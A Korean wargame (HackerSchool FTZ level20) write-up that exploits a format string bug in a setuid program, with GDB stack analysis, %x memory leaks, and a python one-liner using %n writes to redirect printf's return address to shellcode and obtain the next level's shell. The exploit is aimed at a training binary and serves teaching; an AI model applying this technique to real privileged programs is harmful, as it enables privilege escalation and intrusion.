레벨 해킹

2844,

5/143

pogusm

level20 / printf 함수의 RET값을 변경하여 쉘코드 실행하기.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2580 [복사]

level20 / printf 함수의 RET값을 변경하여 쉘코드 실행하기.

[level20@ftz in]$ cat ~/hint

#include <stdio.h>
main(int argc,char **argv)
{ char bleh[80];
  setreuid(3101,3101);
  fgets(bleh,79,stdin);
  printf(bleh);
}

[level20@ftz in]$ ./egg 512 300
Using address: 0xbffff95c

[level20@ftz in]$ gdb -q ~/attackme
(gdb) disass main
Dump of assembler code for function main:
0x080483b8 <main+0>:    push   %ebp
0x080483b9 <main+1>:    mov    %esp,%ebp
0x080483bb <main+3>:    sub    $0x58,%esp
0x080483be <main+6>:    and    $0xfffffff0,%esp
0x080483c1 <main+9>:    mov    $0x0,%eax
0x080483c6 <main+14>:   sub    %eax,%esp
0x080483c8 <main+16>:   sub    $0x8,%esp
0x080483cb <main+19>:   push   $0xc1d
0x080483d0 <main+24>:   push   $0xc1d
0x080483d5 <main+29>:   call   0x80482f8 <setreuid>
0x080483da <main+34>:   add    $0x10,%esp
0x080483dd <main+37>:   sub    $0x4,%esp
0x080483e0 <main+40>:   pushl  0x80495c0
0x080483e6 <main+46>:   push   $0x4f
0x080483e8 <main+48>:   lea    0xffffffa8(%ebp),%eax
0x080483eb <main+51>:   push   %eax
0x080483ec <main+52>:   call   0x80482c8 <fgets>
0x080483f1 <main+57>:   add    $0x10,%esp
0x080483f4 <main+60>:   sub    $0xc,%esp
0x080483f7 <main+63>:   lea    0xffffffa8(%ebp),%eax
0x080483fa <main+66>:   push   %eax
0x080483fb <main+67>:   call   0x80482e8 <printf>
0x08048400 <main+72>:   add    $0x10,%esp
0x08048403 <main+75>:   leave
0x08048404 <main+76>:   ret
0x08048405 <main+77>:   nop
0x08048406 <main+78>:   nop
0x08048407 <main+79>:   nop
End of assembler dump.
(gdb) br *main+1
Breakpoint 1 at 0x80483b9
(gdb) r
Starting program: /home/level20/attackme

Breakpoint 1, 0x080483b9 in main ()
(gdb) x/x $esp
0xbffff0c8:     0xbffff0e8
(gdb)
0xbffff0cc:     0x40038917
(gdb)

/// GDB를 통해, main+0까지 실행된 상태에서의 스택포인터(esp=0xbffff0c8)의 값은 0xbffff0e8(=이전ebp주소).
/// 현재스택포인터+0x4(esp+0x4) = RET주소가 저장된 스택의 위치.
/// 이전ebp주소로부터 RET주소가 저장된 스택 까지의 거리는 0xbffff0e8 - 0xbffff0cc = 0x1c(=28)

[level20@ftz in]$ gdb -q ~/attackme
(gdb) br *main+1
Breakpoint 1 at 0x80483b9
(gdb) r
Starting program: /home/level20/attackme

Breakpoint 1, 0x080483b9 in main ()
(gdb) disass printf
Dump of assembler code for function printf:
0x40074f80 <printf+0>:  push   %ebp
0x40074f81 <printf+1>:  mov    %esp,%ebp
0x40074f83 <printf+3>:  sub    $0x18,%esp
0x40074f86 <printf+6>:  mov    %ebx,0xfffffffc(%ebp)
0x40074f89 <printf+9>:  mov    0x8(%ebp),%eax
0x40074f8c <printf+12>: lea    0xc(%ebp),%edx
0x40074f8f <printf+15>: call   0x4003877d <__i686.get_pc_thunk.bx>
0x40074f94 <printf+20>: add    $0xe422c,%ebx
0x40074f9a <printf+26>: mov    %eax,0x4(%esp,1)
0x40074f9e <printf+30>: mov    0x118(%ebx),%eax
0x40074fa4 <printf+36>: mov    %edx,0x8(%esp,1)
0x40074fa8 <printf+40>: mov    (%eax),%eax
0x40074faa <printf+42>: mov    %eax,(%esp,1)
0x40074fad <printf+45>: call   0x4006a690 <vfprintf>
0x40074fb2 <printf+50>: mov    0xfffffffc(%ebp),%ebx
0x40074fb5 <printf+53>: mov    %ebp,%esp
0x40074fb7 <printf+55>: pop    %ebp
0x40074fb8 <printf+56>: ret
0x40074fb9 <printf+57>: nop
0x40074fba <printf+58>: nop
0x40074fbb <printf+59>: nop
0x40074fbc <printf+60>: nop
0x40074fbd <printf+61>: nop
0x40074fbe <printf+62>: nop
0x40074fbf <printf+63>: nop
End of assembler dump.
(gdb) br *printf+1
Breakpoint 2 at 0x40074f81
(gdb) c
Continuing.
%x%x%x

Breakpoint 2, 0x40074f81 in printf () from /lib/libc.so.6
(gdb) x/x $esp
0xbffff058:     0xbffff0c8
(gdb)
0xbffff05c:     0x08048400
(gdb)

/// GDB를 통해, printf+0까지 실행된 상태에서의 스택포인터(esp=0xbffff058)의 값은 0xbffff0c8(=이전ebp주소).
/// 현재스택포인터+0x4(esp+0x4) = RET주소가 저장된 스택의 위치.
/// main 함수의 이전ebp주소로부터 RET주소가 저장된 스택 까지의 거리는 0xbffff0e8 - 0xbffff05c = 0x8c(=140)
/// (printf 함수의 이전ebp주소로부터 RET주소가 저장된 스택 까지의 거리는 0xbffff0c8 - 0xbffff05c = 0x6c(=108))

* 스택의 구조

          data in/out

         |                                 |
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         | ebp의주소 : 0xbffff0c8  |     $esp(=0xbffff058) (E)             ^
         +--------------- ------+                                               |
         | RET 값 :  0x08048400   |     0xbffff05c (D)                       +-----  printf 함수의 스택부분
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         | ebp의주소 : 0xbffff0e8  |     $esp(=0xbffff0c8) (C)           ^
         +--------------- ------+                                              |
         | RET 값 :  0x40038917   |     0xbffff0cc (B)                      +-----  main 함수의 스택부분
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         |   data                        |     .
         +--------------- ------+
         | ebp의주소                  |     0xbffff0e8  (A)
         +--------------- ------+
         |   RET 값                    |     0xbffff0ec
         +--------------- ------+

/// hint에서 확인한 바로는, ~/attackme 프로그램은 포맷스티링 버그가 있고,
/// fgets(bleh,79,stdin); 에 의해서, 79개의 문자열을 printf로 넘길수 있다..
/// 쉘상태에서의 RET주소를 확인해보자.

[level20@ftz in]$ ~/attackme
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
4f401574604009d500782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578258007825401591c040015360bffff0c8400389171bffff0f4bffff0fc4001582c180483080804832980483b81bffff0f48048408

/// 위와 같은 방법으로 포멧스트링버그를 이용하여, %x를 최대 39개까지(78문자열) 넘길수 있다.
/// 이때출력되는 값은, 출력되는 순간의 현재 %esp의 값부터, +0x4 씩 순차적으로 출력되는것 같다.
/// 위 결과에서, 기준이 되는 main함수의 RET값을 확인해보니, ....bffff0c840038917... 라고 확인할 수 있다.
/// (bffff0c8 는
/// 위표에서는 $esp(=0xbffff0c8) --> ebp의주소 : 0xbffff0e8 (C) 부분의,
/// ebp의주소 : 0xbffff0e8 주소와 대응되는것이다. (gdb상태에서의 실행과 shell상태에서의 실행이 다른 이유임)
/// 표에서 (E)부분과는 별개이다. 혼돈주의)
/// 즉, 0xbffff0c8-0x8c(=140) = 0xBFFFF03C 주소에  printf 함수에서 사용할 이전함수(main)의 RET값(0x08048400)이 저장되어 있다고 유추할수 있다.
/// ( 0xbffff0c8-0x1c= 0xBFFFF0AC 주소에는  main함수에서 사용할 이전함수의 RET값(840038917)이 저장되어 있다고 유추할수 있다.)

/// [level20@ftz in]$ ~/attackme
/// %x%x%x%x%x%x%x%x%x..........
/// 위와 같은 방법으로, 직접 printf함수가 사용하는 RET값(0x08048400)을 찾을수도 있겠으나,
/// 공격대상 프로그램 fgets 함수가.. 표준입력되어진 문자열을 79개까지만 한정했기때문에...
/// 그 범위를 벗어나는 printf함수가 사용하는 RET값까지는 추적할 수 없었다...

/// 공격준비
[level20@ftz in]$ ~/attackme
AAAABBBB %x %x %x %x %x
AAAABBBB 4f 40157460 4009d500 41414141 42424242

/// 위 결과로써, $-flag를 이용해서 format string공격을 할수 있다.
/// main의 0xBFFFF03C주소에 들어있는 정상적인 RET값(0x08048400)을,
/// 쉘코드가 시작되는 곳의 주소로 덮어씌기할것이다.

Using address: 0xbffff95c

0xf95c =63836
63836-8byte = 63828

0x1bfff = 114687
114687-63836=50851

"\x3c\xf0\xff\xbf"+"\x3e\xf0\xff\xbf"  -- 8byte
"%63828x%4$n%50851x%5$n"

[level20@ftz in]$ (python -c 'print "\x3c\xf0\xff\xbf"+"\x3e\xf0\xff\xbf"+"%63828x%4$n%50851x%5$n"';cat) | ~/attackme
..............생략............................
                                                                               40157460
id
uid=3101(clear) gid=3100(level20) groups=3100(level20)
my-pass
TERM environment variable not set.

clear Password is "************************".

---------------------------------------------------------------------------------------------
참고문서--
How to make shellcode in linux for beginners ( http://hdp.null2root.org/system/willy_sc.txt )
Format-String-Bug 이해하기 (http://badnom.com/211)
$-flag를 이용한 Format String 공격 (http://x82.inetcop.org/h0me/papers/$-flag-formatstring.txt)
해커스쿨 질문과답변게시판 randomkid님의 글 (http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=2578)

Hit : 3810 Date : 2007/11/23 03:44